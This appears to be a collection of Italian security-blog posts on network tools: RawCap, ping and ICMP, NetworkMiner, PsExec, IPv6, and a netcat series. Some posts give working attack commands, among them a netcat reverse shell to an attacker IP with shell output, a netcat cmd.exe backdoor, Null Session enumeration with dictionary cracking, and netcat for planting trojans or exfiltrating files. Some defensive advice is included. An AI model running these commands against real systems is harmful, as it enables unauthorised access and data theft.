Durante un penetration test, una volta effettuata un’intrusione su di  una macchina target, può tornare utile sniffare il traffico in transito sulla macchina stessa per poter intercettare credenziali per poter elevare i privilegi o per accedere ad altri host più preziosi. Per svolgere questo compito ci vuole  uno sniffer.

Esistono diversi potenti sniffer, commerciali e gratuiti, che però in genere necessitano di essere installati e necessitano pure driver aggiuntivi. Un penetration tester, oppure chi abbia l’esigenza di effettuare attività di incident response in condizioni critiche o difficili, ha bisogno di uno strumento tattico, facile da dispiegare e da impiegare.

RawCap è un network sniffer free per Windows, ha dimensioni ridotte (17K) e non necessita di installazione. Si tratta di un ideale tool tattico, da utilizzare durante un penetration test o in un’attività di incident response.

Tra i punti di forza:

• Può intercettare anche localhost (127.0.0.1)
• Non necessita di DLL esterne e non è necessario installarlo
• Può intercettare anche le interfacce Wifi e PPP
• Impiega poca memoria
• E’ semplice da usare

La semplicità è forse la caratteristica più evidente di RawCap. Per iniziare ad intercettare traffico basta eseguire il programma invocandolo da linea di comando e specificando l’indirizzo IP dell’interfaccia da sottoporre a controllo e il file dove memorizzare i pacchetti sniffati:

RawCap.exe 192.168.13.37 dumpfile.pcap

Una volta terminata la sessione sarà possibile decodificare il dump file con Wireshark. In alternativa è possibile anche avviare il programma senza specificare parametri; apparirà la lista numerata delle interfacce disponibili e successivamente verrà chiesto il nome del file di dump. Tutto qui.

Ho parlato degli aspetti positivi, ma naturalmente esistono anche i contro. Intanto, è vero che non necessita DLL e installazione, ma è anche vero che è basato su framework .NET2.0; certo,oggi dovrebbe essere disponibile su praticamente tutti i Windows in circolazione, però è corretto segnalarlo.

Altro limite, a detta dell’autore stesso, è l’affidabilità: se funziona perfettamente su XP, la stessa cosa non si può dire per Vista e Win7, a causa della tecnica utilizzata dal programma per effettuare lo sniffing, ovvero le raw socket, che nelle ultime versioni di Windows non sarebbero affidabili come nelle versioni precedenti.

Tirando le somme, RawCap è un ottimo strumento semplice e leggero (e gratuito) da usare in condizioni difficili o critiche, meglio se su Windows XP.

RawCap può essere scaricato dal sito ufficiale:  http://www.netresec.com/

Segnala presso:

Ormai c’è un’apocalisse al giorno: catastrofi,terremoti,crisi,guerre. Forse è per questo motivo che è passato sottotono l’IPv4 Apocalypse. Di che cosa si tratta? In poche parole: gli indirizzi IPv4, ovvero gli indirizzi di Internet, stanno per esaurirsi; anzi, per la precisione sono già esauriti, dal Febbraio 2011.

E’ un problema? Si e no. Può diventare un problema se al più presto non verranno prese delle contromisure, ovvero il passaggio al nuovo protocollo IPv6, dotato di uno spazio di indirizzamento molto più vasto dell’attuale, tale da mettere al riparo la rete da ulteriori esaurimenti di indirizzi per un bel po’ di tempo.

Per sensibilizzare imprese, enti ed utenti a prendere atto del problema, l’Internet Society ha creato un grande evento mondiale, che si svolgerà l’8 Giugno: Il Giorno Mondiale dell’IPv6. Durante questo evento, che può essere considerato come una prova generale per il passaggio a IPv6, Google, Facebook, Akamai e molte altre grandi entità mondiali offriranno i propri contenuti sul nuovo protocollo.

Come passare al nuovo protocollo? In realtà tutti i sistemi operativi più diffusi supportano questo nuovo standard (a dire il vero da parecchio tempo). L’unico elemento che manca è il raccordo tra la rete IPv4 e la nuova rete IPv6. Questo elemento è un tunnel che incapsula i pacchetti IPv4, e li invia ad un gateway (il tunnel-broker) che si occupa di instradare il traffico verso la nuova rete.

Tutto questro sembra assai complesso, ma esistono servizi che offrono l’accesso IPv6 senza particolari difficoltà.  Chi volesse provare il brivido di navigare sul nuovo protocollo può usare Freenet6. Si tratta di un client che fornisce l’interfaccia necessaria per poter inviare (in modo del tutto trasparente) il traffico di rete del proprio computer verso la rete IPv6. Una volta scaricato e installato dovreste essere in grado di raggiungere i servizi disponibili sul nuovo protocollo, come ipv6.google.com.

Segnala presso:

Ping è un programma diffuso praticamente su tutti i sistemi disponibili, si tratta di un’utility di diagnostica che serve per misurare il tempo impiegato tra l’invio di un pacchetto dati e la ricezione della risposta dall’host remoto.

Il comando può essere utilizzato sia in LAN, sia in Internet, ma anche tra due computer collegati con un cavo di rete. E’ utile per capire se due computer “si vedono”, ovvero possono dialogare scambiandosi dati.

In questo esempio mostro l’utilizzo di ping dal mio computer verso il router della mia rete, dove 192.168.1.1 è appunto l’indirizzo del router:

C:\PillolHacking>ping 192.168.1.1
 
Esecuzione di Ping 192.168.1.1 con 32 byte di dati:
 
Risposta da 192.168.1.1: byte=32 durata=5ms TTL=64
Risposta da 192.168.1.1: byte=32 durata=3ms TTL=64
Risposta da 192.168.1.1: byte=32 durata=3ms TTL=64
Risposta da 192.168.1.1: byte=32 durata=4ms TTL=64
 
Statistiche Ping per 192.168.1.1:
Pacchetti: Trasmessi = 4, Ricevuti = 4, Persi = 0 (0% persi),
Tempo approssimativo percorsi andata/ritorno in millisecondi:
Minimo = 3ms, Massimo =  5ms, Medio =  3ms

In un altro articolo parlavo di come riuscire a capire, o perlomeno a tentare di indovinare il tipo di sistema operativo del computer remoto analizzando il campo TTL (in questo 64 ci suggerisce che il sistema operativo del router è basato sul kernel Linux).

Questa volta voglio soffermarmi su di un altro aspetto, anzi mi faccio una domanda:come funziona il ping, cosa succede dietro le quinte quando digito questo comando?

Il funzionamento di ping si basa sul protocollo ICMP (Internet Control Message Protocol), un protocollo espressamente ideato per fornire servizi di diagnostica e controllo della rete. La struttura di questo protocollo è abbastanza semplice, infatti ICMP si compone di 4 campi:

1. Tipo
2. Codice
3. Checksum
4. Dati

Particolarmente interessante è il campo Tipo. I tipi possono essere una trentina circa, ma quelli che ci interessano sono 2:

1. Tipo 0: Echo reply
2. Tipo 8: Echo request

Quando digitiamo il comando ping, dopo aver fornito l’indirizzo Ip dell’host da controllare, avvengono le seguenti azioni:

1. Viene inviato un pacchtto dati ICMP di tipo 8 (Echo request) verso l’Ip specificato
2. L’host remoto risponde con un paccheto ICMP di tipo 0 (Echo reply)

Ho catturato la sessione ping riportata sopra con Wireshark, qui sotto possiamo vedere lo scambio di pacchetti ICMP dall’host sorgente (il computer da cui ho impartito il comando) ovvero 192.168.1.6, e il router 192.168.1.1:

ecco la risposta da 192.168.1.1:

Queste immagini evidenziano la parte ICMP del pacchetto dati. La prima immagine mostra l’invio di Echo request  (notare il byte 22 impostato a 8), da 192.168.1.6 verso 192.168.1.1 (i dati relativi agli indirizzi sono inclusi nell’header Ip); La seconda mostra la risposta proveniente da 192.168.1.1, con Echo reply (si vede il byte 22 del segmento ICMP impostato a 0).

Analizzando i pacchetti si nota anche come Windows riempia con caratteri alfabetici (abcdefghjklmnopqrst…) il campo dati da 32 byte. Il pacchetto Echo reply si limita a ricopiare questi 32 byte e rispedirli al mittente.

Spero che questa spiegazione sia riuscita a chiarire alcuni aspetti di ping e del protocollo ICMP. Prossimamente ci addentreremo nei meandri della rete analizzando i protocolli e facendo a pezzi i pacchetti dati con Wireshark e affini.

Segnala presso:

Per Network Forensics Analysis Tool si intende uno strumento in grado di ricostruire sessioni di networking dove poter trovare le prove di un reato (intrusione o qualsiasi altro incidente).

NetworkMiner può essere utilizzato anche per monitorare una rete alla ricerca di computer non autorizzati, ovvero computer che abusivamente utilizzano il network; è possibile inoltre trovare servizi non autorizzati (per esempio software p2p che vampirizzano la banda).

Le capacità di forensics permettono al programma di recuperare credenziali (nomi utente, password), url visitati e relativi parametri. NetworkMiner  è inoltre in grado di ricostruire i file trasferiti durante la sessione, permettendo all’investigatore di ottenere copia degli upload/download effettuati dal sospettato. Con questa funzione è possibile scoprire eventuali malware, e altro materiale illegale.

Un’altra caratteristica di NetworkMiner è la capacità di analizzare passivamente host remoti, riuscendo ad ottenere la lista delle porta Tcp aperte, e il tipo di sistema operativo (fingerprinting).

Questo software (che è open-source) è versatile e può essere utilizzato sia in ambito security sia in ambito hacking/ethical hacking, e anche in ambito computer/network forensics.

Lo si può scaricare a questo indirizzo: http://networkminer.sourceforge.net/

Segnala presso:

La suite PsTools oggi reperibile sul sito Microsoft Technet è un insieme di comandi per l’amministrazione di Windows ispirati al comando ps di Linux. Uno dei comandi più potenti è psexec, un programma che permette di eseguire programmi da remoto su una macchina di cui si ha l’accesso.

Con psexec si può accedere alla shell di Windows con molta semplicità: basta digitare il comando seguito dal nome del computer, il nome utente (con l’opzione -u), la password (opzione -p) e il comando da eseguire. Per esempio, io seguente comando:

psexec \\192.168.132.128 -u administrator cmd.exe

apre una shell di Windows con la quale interagire da remoto:

PsExec v1.94 - Execute processes remotely
Copyright (C) 2001-2008 Mark Russinovich
Sysinternals - www.sysinternals.com
 
Password:
 
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\WINDOWS\system32>

PsExec è utile in diversi scenari:

• Amministrazione: con psexec si possono fare tutte le cose che si possono fare con la linea di comando. Se avete una rete con diversi computer è il modo più semplice per accedere ai vari sistemi senza dover installareVNC o altri software di accesso remoto.

• Hacking l’hacker può accedere alla shell sfruttandola come backdoor, dopo avere ottenuto un accesso abusivo tramite il cracking degli account scoperti con la Null Session , oppure dopo essere riuscito ad entrare tramite un exploit, il recupero del SAM database e il cracking delle password.

Con PsExec è possibile anche caricare un programma prima di eseguirlo utilizzando l’opzione -c nomeprogramma.

Cosa ci si può fare?

• Spegnere il computer da remoto: con il comando shutdown (shutdown -s -t 0 per esempio).

• Aggiungere/Rimuovere utenti: con il comando net user.

• Avviare/Fermare servizi: con net start/stop.

Segnala presso:

In questo caso per poter prendere il controllo del sistema si può utilizzare un back-channel. Il back-channel è un canale che parte dalla macchina remota e termina sul nostro computer.Con un back-channel sarà l’host sotto attacco a collegarsi a noi, e sul nostro computer apparirà la shell del computer remoto.

Per spiegare come fare a utilizzare netcat come back-channel mostro un esempio sfruttando due computer: il computer dell’hacker su cui gira Windows XP, e la quello della vittima su cui invece è installato Linux Ubuntu.

La macchina dell’attacker ha l’indirizzo Ip 192.168.132.1, la vittima 192.168.132.130.

Per prima cosa apro il prompt dei comandi e metto netcat in ascolto sulla porta 9999:

C:\Documents and Settings\angelor>nc -l -p 9999 -vv

l’opzione -l mette netcat in ascolto, il parametro -p specifica la porta Tcp.

Sull’altro computer su cui come ho detto gira Linux Ubuntu, digito il seguente comando:

angelor@daikengo:~$ nc 192.168.132.1 9999 -e /bin/sh -vv

nei parametri viene specificato l’Ip del computer dell’attacker (192.168.132.1) e la porta; con l’opzione -e si esegue la shell di sistema /bin/sh. Però l’output verrà indirizzato sul canale aperto Tcp aperto con l’altro computer e non in locale:

(UNKNOWN) [192.168.132.1] 9999 (?) open

questo messaggio indica che il computer dell’hacker ha accettato la connessione. Dall’altra parte, sul computer dell’hacker:

192.168.132.130: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.132.1] from (UNKNOWN) [192.168.132.130] 36156: NO_DATA

questo indica che il computer remoto (Ubuntu, 192.168.132.130) ha aperto una connessione verso questo computer. A questo punto non rimane che digitare comandi: comandi Linux naturalmente!

wUSER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
angelor  pts/0    :0.0             22:15   23.00s  0.32s  0.00s sh

uname -a
Linux daikengo 2.6.24-19-generic #1 SMP Wed Jun 18 22:43:41 UTC 2008 i686 GNU/Linux

ls / -al
drwxr-xr-x  21 root root  4096 2008-08-24 17:52 .
drwxr-xr-x  21 root root  4096 2008-08-24 17:52 ..
drwxr-xr-x   2 root root  4096 2008-08-24 17:53 bin
drwxr-xr-x   3 root root  4096 2008-08-24 17:52 boot
lrwxrwxrwx   1 root root    11 2008-08-24 17:43 cdrom -> media/cdrom
drwxr-xr-x  10 root root 13700 2008-11-25 10:14 dev
drwxr-xr-x 120 root root  4096 2008-11-25 10:15 etc
drwxr-xr-x   3 root root  4096 2008-08-24 17:48 home
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 initrd
lrwxrwxrwx   1 root root    33 2008-08-24 17:52 initrd.img -> boot/initrd.img-2.6.24-19-generic
drwxr-xr-x  16 root root  4096 2008-08-24 17:53 lib
drwx------   2 root root 16384 2008-08-24 17:43 lost+found
drwxr-xr-x   4 root root  4096 2008-07-02 12:16 media
drwxr-xr-x   2 root root  4096 2008-04-15 07:53 mnt
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 opt
dr-xr-xr-x 116 root root     0 2008-11-25 10:13 proc
drwxr-xr-x   3 root root  4096 2008-08-24 17:52 root
drwxr-xr-x   2 root root  4096 2008-08-24 17:53 sbin
drwxr-xr-x   2 root root  4096 2008-07-02 12:16 srv
drwxr-xr-x  12 root root     0 2008-11-25 10:13 sys
drwxrwxrwt  13 root root  4096 2008-11-25 10:19 tmp
drwxr-xr-x  11 root root  4096 2008-07-02 12:18 usr
drwxr-xr-x  15 root root  4096 2008-07-02 12:34 var
lrwxrwxrwx   1 root root    30 2008-08-24 17:52 vmlinuz -> boot/vmlinuz-2.6.24-19-generic

Naturalmente tutto questo funziona se il firewall permette connessioni in uscita (in genere lo permette).

Questo articolo fa parte della serie “Le 7 Vite di Netcat“. Potrai trovare altre informazioni su Netcat negli altri articoli della serie:

• Leggere gli header HTTP e le pagine Web con Netcat

• Leggere la posta elettronica con Netcat

• Inviare email con Netcat

• Netcat come scanner

• Trasferire file con Netcat

• Creare una backdoor con Netcat

• Back Channel con Netcat

Segnala presso:

Ottenere l’elenco delle condivisioni può permettere un’intrusione semplice. Le condivisioni potrebbero non essere protette da password, nel qual caso si potrebbe accedere a informazioni importanti. Potrebbero anche esserci condivisioni attivate alla scrittura, eventualità che permetterebbe all’hacker di infiltrare un trojan nella cartella dell’esecuzione automatica.

Con l’elenco degli utenti si potrebbe tentare un attacco a dizionario, testando una lista di password contro ogni utente valido.

Infine le informazioni potrebbero essere utilizzate come leva per ottenere la fiducia di un impiegato in un attacco di social-engineering.

Creare la Null Session

Se provassimo a visualizzare le risorse di un computer senza effettuare una Null Session otterremmo un errore di accesso negato:

net view \\127.0.0.1

Per creare una Null Session bisogna utilizzare il comando net use, specificare l’indirizzo del computer, invocare la risorsa IPC$ e fornire credenziali nulle:

C:\Documents and Settings\angelor>net use \\127.0.0.1\IPC$ "" /u:""

Se il computer remoto accetta la Null Session, otterremo questo messaggio eseguendo net use senza parametri:

C:\Documents and Settings\angelor>net use
Stato       Locale     Remota                    Rete
-------------------------------------------------------------------------------
OK                     \\127.0.0.1\IPC$          Rete di Microsoft Windows
Esecuzione comando riuscita.

A questo punto net view visualizzerà l’eventuale lista di risorse (non quelle nascoste però).

Sfruttare la Null Session

Per facilitare l’interazione con la Null Session sono stati creati diversi tools. Alcuni tra questi sono enum, winfo e hunt. Con questi strumenti è possibile ottenere liste di utenti, risorse condivise (anche nascoste) e altre informazioni (come le policy delle password o la versione del sistema operativo) tramite Null Session. Vediamo nel dettaglio.

Sia hunt che winfo sono molto semplici da usare: bisogna invocare il comando da linea di comando specificando l’indirizzo Ip (nel formato preceduto da \\ se si utilizza hunt). Winfo permette di specificare se creare una Null Session prima di tentare il recupero delle informazioni.

Uno strumento a mio parere più potente è enum. Oltre ad avere più opzioni rispetto agli altri due, conesente anche un attacco a dizionario.

Ecco la lista delle opzioni di enum:

usage:  enum  [switches]  [hostname|ip]
-U:  get userlist
-M:  get machine list
-N:  get namelist dump (different from -U|-M)
-S:  get sharelist
-P:  get password policy information
-G:  get group and member list
-L:  get LSA policy information
-D:  dictionary crack, needs -u and -f
-d:  be detailed, applies to -U and -S
-c:  don't cancel sessions
-u:  specify username to use (default "")
-p:  specify password to use (default "")
-f:  specify dictfile to use (wants -D)

e un esempio con obiettivo Windows XP:

enum  -UMNSPGL 192.168.132.128
server: 192.168.132.128
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
netbios: TEST
domain: WORKGROUP
quota:
paged pool limit: 33554432
non paged pool limit: 1048576
min work set size: 65536
max work set size: 251658240
pagefile limit: 0
time limit: 0
trusted domains:
indeterminate
netlogon done by a PDC server
getting namelist (pass 1)... got 4, 0 left:
Administrator  Guest  HelpAssistant  SUPPORT_328945a3
getting user list (pass 1, index 0)... success, got 4.
Administrator  Guest  HelpAssistant  SUPPORT_328945a3
enumerating shares (pass 1)... got 3 shares, 0 left:
IPC$  ADMIN$  C$
getting machine list (pass 1, index 0)... success, got 0.
Group: Administrators
TEST\Administrator
Group: Backup Operators
Group: Guests
TEST\Guest
Group: Network Configuration Operators
Group: Power Users
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Group: Utenti desktop remoto
Group: HelpServicesGroup
TEST\SUPPORT_328945a3
cleaning up... success.

In questo esempio riusciamo ad ottenere la lista delle condivisioni (tutte nascoste in questo caso): IPC$,ADMIN$ e C$ e una lista di utenti, ovvero Administrator,Guest,HelpAssistant e SUPPORT_328945a3.

Utilizzando l’opzione D (dictionary crack, con -u per specificare l’utente e -f per specificare il dizionrio da usare) è possibile ottenere l’accesso e quindi “montare” in locale il disco C$ della macchina da attaccare:

net use H: \\192.168.132.128\C$

Per chi fosse alla ricerca di dizionari da utilizzare in attacchi di questo tipo consiglio questo indirizzo: http://packetstormsecurity.org/Crackers/wordlists/

Come Difendersi

I sistemi operativi Microsoft attualmente diffusi per default non mostrano la lista degli utenti. Per controllare, attivare o disabilitare la Null Session su Xp e Window 2003 è possibile utilizzare l’interfaccia grafica secpol.msc, da invocare da Start -> Esegui (o tasto Windows + R).

Le voci interessate sono le seguenti:

Criteri Local -> Opzioni di protezione

Accesso di rete: non consentire l’enumerazione anonima degli account SAM
Accesso di rete: non consentire l’enumerazione anonima di account e condivisioni SAM

Attivando entrambe le voci gli utenti anonimi (ovvero con credenziali nulle) non saranno in grado di elencare gli utenti e neppure la lista delle risorse condivise, riducendo notevolmente la superficie di attacco per un pirata.

Le porte Tcp/Udp coinvolte in questo attacco sono le seguenti: 135,137,138,139,445. Filtrarle con un personal firewall, perlomeno sull’interfaccia esposta a Internet può mitigare il pericolo e neutralizzare questo tipo d’attacco.

L’attacco Null Session è sicuramente uno dei più antichi attacchi per Windows, nel passato ha fatto molte vittime. Le policy di sicurezza standard delle ultime versioni di Windows (da XP Professional a Vista, Windows 2003 compreso) rendono questo attacco meno diffuso. Ma non è detto che non si trovino configurazioni deboli.

Segnala presso:

Cos’è una backdoor? Una “porta di servizio” che permette l’amministrazione remota del computer.
In genere dopo aver ottenuto l’accesso al computer  l’hacker ha la necessità di tornare nel sistema in modo più agevole, oppure ha bisogno di un’interfaccia a linea di comando (shell) con la quale poter agire comodamente.

Abbiamo già visto che netcat può essere usato come server. In questo articolo vediamo come collegare a netcat in ascolto su di una porta Tcp la shell di sistema.

Per attivare netcat come backdoor usiamo il seguente comando:

nc -l -p 9999 -vv -e cmd.exe

Vediamo nel dettaglio. Il parametro -l lo abbiamo già visto nell’articolo sul trasferimento di file e dice a netcat di “ascoltare” sulla porta Tcp indicata dal parametro -p, in questo caso 9999 (valore arbitrario). Il cuore della tecnica è il parametro -e, che seguito da cmd.exe istruisce netcat a eseguire (-e ovvero exec) il comando specificato (cmd.exe, la shell di Windows) veicolando l’input/output attraverso netcat stesso.

Come ci si collega ad un host su cui è stata messa questa backdoor? Ma naturalmente con netcat!
Se il computer sotto controllo ha come indirizzo Ip 192.168.0.1, otterremo l’accesso remoto con il comando:

nc 192.168.0.1 9999 -vv

ci troveremo di fronte al prompt dei comandi di Windows; solo che questo prompt non è della nostra macchina, ma quello della macchina remota!
Per uscire dalla backdoor basta semplicemente digitare exit e la connessione si chiude. E qui c’è un problema.

Una volta chiusa la connessione in netcat remoto smette di ascoltare, semplicemente termina l’esecuzione; quindi non sarà più possibile collegarsi da remoto. Per aggirare questo problema ci viene in soccorso il parametro -L.

nc -L -p 9999 -vv > trojan <– notare la L maiuscola al posto di -l

Il parametro -L istruisce netcat a mantenere aperta la porta e restare in ascolto anche quando il programma eseguito con il comando -e viene interrotto. Così si potrà entrare e uscire dal sistema a piacere.

Un avvertimento necessario: questa tecnica è pericolosissima! Aprire una backdoor in questo modo, aprire una shell senza la protezione di una password è quasi un suicidio, significa spalancare una porta del sistema a chiunque. Se lo fate su un vostro sistema, se proprio dovete farlo, fatelo per periodi brevissimi e su porte non standard o non facilmente intuibili (9999 e 12345 non vanno benissimo).

Questo articolo fa parte della serie “Le 7 Vite di Netcat“. Potrai trovare altre informazioni su Netcat negli altri articoli della serie:

• Leggere gli header HTTP e le pagine Web con Netcat

• Leggere la posta elettronica con Netcat

• Inviare email con Netcat

• Netcat come scanner

• Trasferire file con Netcat

• Creare una backdoor con Netcat

• Back Channel con Netcat

Segnala presso:

Questa caratteristica di netcat può essere utile in diversi casi. Può essere il modo più semplice e veloce per passare file tra due computer senza dover attivare condivisioni o installare servizi. Oppure durante un penetration test o durante un’intrusione può essere molto utile portare velocemente sul computer sotto attacco  trojan, rootkit o altri strumenti; oppure può essere necessario esfiltrare file senza lasciare tracce nei log. Un altro punto forte di questa tecnica è la diffusione di netcat sulle macchine Unix/Linux. Se si deve portare dei file su un Linux in rete senza troppi problemi si può utilizzare netcat.

La tecnica è abbastanza semplice: si usano due netcat, uno sulla macchina sorgente e uno sulla macchina di destinazione. Quest’ultimo avrà la funzione di server.

Netcat può agire come server. Questo significa che può mettersi “in ascolto” su di una porta Tcp e attendere una connessione. Per attivare questa funzione bisogna specificare sulla riga di comando il parametro -l (listen) e specificare la porta (-p):

nc -l -p 9999 -vv > miofile

Questo comando mette netcat in ascolto sulla porta 9999; l’output viene reindirizzato al file miofile tramite il simbolo >.

Questo significa che tutto quello che netcat riceverà sulla rete attraverso la porta 9999 verra memorizzato in un file di nome miofile. Sia il valore della porta (in questo caso  9999), sia il nome del file (miofile), sono arbitrari, possono essere qualsiasi cosa.

Mentre sul server netcat “ascolta”, sulla macchina sorgente, ovvero sulla macchina sulla quale è memorizzato il file da trasmettere al server, dovremo usare unnetcat in modalità client per inviare i dati del file da trasferire:

nc 127.0.0.1 9999 -vv < miofile

Con questo comando invio il file “miofile” tramite la redirezione dell’input ottenuta con il simbolo < all’host 127.0.0.1, ovvero il computer sul quale netcat è in “ascolto”, sulla porta 9999. In questo esempio ho utilizzato l’indirizzo del computer locale (127.0.0.1), ma nella realtà naturalmente l’indirizzo dovrà coincidere con l’Ip reale del computer server. Ovvero se il computer sul quale netcat è in ascolto in modalità server è 192.168.0.1, nel netcat in modalità client dovrò indicare proprio questo indirizzo.

Un’ultima considerazione: netcat non fornisce un indicatore di progresso del trasferimento in corso; per sapere quando il trasferimento stesso è terminato occorre controllare con il comando dir ols le dimensioni crescenti del file.

Questo articolo fa parte della serie “Le 7 Vite di Netcat“. Potrai trovare altre informazioni su Netcat negli altri articoli della serie:

• Leggere gli header HTTP e le pagine Web con Netcat

• Leggere la posta elettronica con Netcat

• Inviare email con Netcat

• Netcat come scanner

• Trasferire file con Netcat

• Creare una backdoor con Netcat

• Back Channel con Netcat

Segnala presso:

Ottenere il BT_ADDR è abbastanza semplice: si può usare BlueOver, un software in Java funzionante su qualsiasi cellulare recente. Questo programma permette di effettuare una scansione e rilevare i cellulari vicini mostrando il relativo BT_ADDR.

Una volta ottenuto il BT_ADDR basterà cercare su Internet il codice per risalire al costruttore. Per farlo si può usare il fornitissimo database a questo indirizzo: http://www.coffer.com/mac_find/

Segnala presso: